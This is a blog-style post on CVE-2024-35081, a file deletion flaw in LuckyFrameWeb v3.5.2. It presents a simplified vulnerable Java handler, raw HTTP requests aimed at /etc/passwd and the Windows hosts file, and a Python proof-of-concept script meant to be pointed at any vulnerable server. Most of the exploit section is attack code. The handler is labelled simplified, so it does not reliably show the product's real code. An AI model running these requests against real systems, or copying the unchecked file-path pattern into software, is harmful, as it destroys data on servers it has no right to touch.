CVE-2024-35081 - How LuckyFrameWeb v3.5.2 Lets Attackers Delete Any File

CVE-2024-35081 is a vulnerability that affects LuckyFrameWeb v3.5.2. This bug allows an attacker to delete any file on the server, just by changing a filename parameter in a web request. In this post, I’ll break down what this means, how it happens, and show a simple exploit example. If you’re using LuckyFrameWeb, you need to fix this fast.

What Is LuckyFrameWeb?

LuckyFrameWeb is a Chinese web application framework, popular for building management and business platforms. v3.5.2 is a widely deployed version in different enterprise environments.

The Vulnerability: Arbitrary File Deletion

CVE-2024-35081 happens because the fileDownload method in LuckyFrameWeb takes whatever filename you give it and processes it without any checks. This means you can make the server delete any file you want, as long as you know its path.

Here’s the logic inside fileDownload (simplified for clarity)

public void fileDownload(HttpServletRequest request, HttpServletResponse response) {
    String fileName = request.getParameter("fileName"); // <-- user input!
    File file = new File(fileName);
    if (file.exists()) {
        file.delete(); // <-- deletes file directly!
        response.getWriter().write("File deleted");
    } else {
        response.getWriter().write("File not found");
    }
}

There’s no check to make sure users can only delete their own files. Any path you give it—even critical system files—gets deleted if the app has permissions.

Exploit Details

An attacker doesn’t need to log in. They can just send a GET or POST request to the endpoint using fileDownload with a special fileName value.

Exploit Request Example

Suppose the app is running at https://example.com/.

HTTP Request

GET /LuckyFrameWeb/fileDownload?fileName=/etc/passwd HTTP/1.1
Host: example.com

Or, for Windows servers

GET /LuckyFrameWeb/fileDownload?fileName=C:\Windows\System32\drivers\etc\hosts HTTP/1.1
Host: example.com

If the server process user has permission to delete those files, they’re gone!

PoC: Exploit Script

Below is a Python exploit to delete /tmp/test.txt on a vulnerable server.

import requests

TARGET = 'http://vulnerable-server.com/LuckyFrameWeb/fileDownload';
FILENAME = '/tmp/test.txt'

params = {'fileName': FILENAME}
resp = requests.get(TARGET, params=params)

print("Status:", resp.status_code)
print("Response:", resp.text)

Note: Change TARGET and FILENAME as needed. If the file exists and is writeable, it gets deleted.

Original References

- NVD Entry: CVE-2024-35081
- LuckyFrameWeb Official Site

Conclusion

*CVE-2024-35081* is easy to exploit and dangerous. If you run LuckyFrameWeb, patch now or risk losing critical files on your server. If this post helped you understand or secure your systems, please share it with others.

Stay safe – patch fast!

*This post is original and simplified for practical understanding. For more depth, check the original CVE link above.*

Timeline

Published on: 05/23/2024 17:15:30 UTC
Last modified on: 07/03/2024 02:01:20 UTC